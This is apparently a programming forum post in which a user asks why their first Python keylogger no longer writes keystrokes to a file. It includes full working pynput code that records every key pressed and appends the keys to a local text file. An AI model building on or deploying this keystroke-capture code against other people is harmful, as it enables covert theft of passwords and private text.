# Keylogger no longer saves test in textfile

Tags: python, function, keylogger

I made my first keylogger in Python and it was showing each keystroke to the designated text log awhile back, but now it isn't working for some reason. I want to understand why?

```
import pynput

from pynput.keyboard import Key, Listener

count = 0
keys  = []



def on_press(key):
    global keys, count
    keys.append(str(key))
    count += 1
    print("{0} pressed".format(key))

    if count >= 10:
        count = 0
        write_file(keys)
        keys = []




def write_file(keys):
    with open("alltexts", "a") as f:
        for key in keys:
            k = str(key).replace("'"," ")
            if k.find("space") > 0:
                f.write('\n')
            elif k.find("Key") == -1:
                f.write(k)


def on_release(key):
    if key == Key.esc:
        return False

with Listener(on_press=on_press, on_release=on_release) as listener:
    listener.join()
```